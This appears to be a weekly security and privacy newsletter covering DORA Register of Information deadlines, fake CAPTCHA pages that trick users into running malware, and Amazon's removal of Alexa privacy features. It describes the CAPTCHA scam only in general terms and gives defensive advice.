This week:
3 – DORA’s Register of Information: Chaos Theory In Real Life
2 – Captcha: How a fake CAPTCHA could catch you out
1 – Alexa: The constant trade-off between convenience and privacy
3 – DORA’s Register of Information: Chaos Theory In Real Life
“Financial entities subject to the Digital Operational Resilience Act (DORA) (Regulation (EU) 2022/2554) will be required to submit Registers of Information (RoIs) in relation to all contractual arrangements on the use of ICT services provided by ICT third-party service providers [between] 1 to 4 April 2025.”
What’s the story?
If DORA is not something you need to worry about, share a thought for everyone who does, because this week is a big week in DORA Land.
Each financial entity subject to DORA needs to submit their ‘Register of Information’ (RoI) by the end of the week.
No big deal, you say. Another month, another regulatory deadline.
And that’s true.
So what?
I’m not seeing anyone talking about this online, but in private 1:1 conversations with many of the teams dealing with this, I hear that this whole process has been chaotic*. (*The language used is more colourful than ‘chaotic’, but I’ll keep it clean).
And I can understand why.
The technical standards for the RoI were only officially published a few months ago. And apparently, with just days to go before the deadline, regulatory guidance on what is expected of regulated firms continues to be ‘finessed’.
So, if you’re part of a team struggling with your RoI, you’re not the only one.
And unfortunately, it sounds like we all need to be ready for lots of rejections and rework after the regulators have reviewed the submissions.
Source:
Central Bank of Ireland’s DORA Register of Information Page
2 – How a fake CAPTCHA could catch you out
“There are more and more sites that [..] instruct victims on how to infect their own machine. [..] It usually starts on a website that promises visitors some kind of popular content: Movies, music, pictures, news articles, you name it. Nobody will think twice when they are asked to prove they are not a robot. [..] If you follow the steps you will actually be infecting yourself with malware.”
What’s the story?
Malicious websites are employing fake CAPTCHA verifications to trick users into infecting their Windows device with ransomware.
These sites copy malicious code to the user’s clipboard and fool the user into running it, leading to the installation of information-stealing malware.
Below is a screenshot of what this attack looks like:
So what?
The likelihood of this attack succeeding can be significantly reduced by:
- Avoiding websites that promise ‘free’ access to paid-for content (e.g. movies; sports; pictures; music). If you’re not paying for the product, you are the product.
- Keeping an eye out for unusual requests like this one.
- Using up-to-date anti-malware / endpoint protection software on your Windows device.
- Ensuring you do not log in to your Windows device with an account that has ‘Administrator’ access – Your day-to-day account should only have ‘Standard’ access. ‘Administrator’ access should be reserved for special occasions.
Otherwise, proving ‘I’m not a robot’ may prove to be the wrong thing to do.
Source:
1 – Alexa: The constant trade-off between convenience and privacy
“Amazon has disabled two key privacy features in its Alexa smart speakers, in a push to introduce artificial intelligence-powered ‘agentic capabilities’ and turn a profit from the popular devices.”
What’s the story?
As of Friday, Amazon has removed two privacy features from its Alexa devices:
- The ability to process voice commands locally, and
- The option to prevent recordings from being sent to the cloud.
Now, all voice data will be sent to Amazon’s cloud servers for processing, and choosing not to save recordings will disable future personalisation features.
So what?
Every time I walk into our kitchen, I pull the plug on our Alexa device (and plug out all the chargers that are not actually charging anything, but let’s not talk about that.)
As soon as anyone else walks into the kitchen, they plug Alexa back in.
In other words, Alexa is an excellent ‘real world’ example of how our constantly-connected world presents us with frequent trade-offs between convenience and privacy.
And we all have different views on what the trade-off should be.
Source: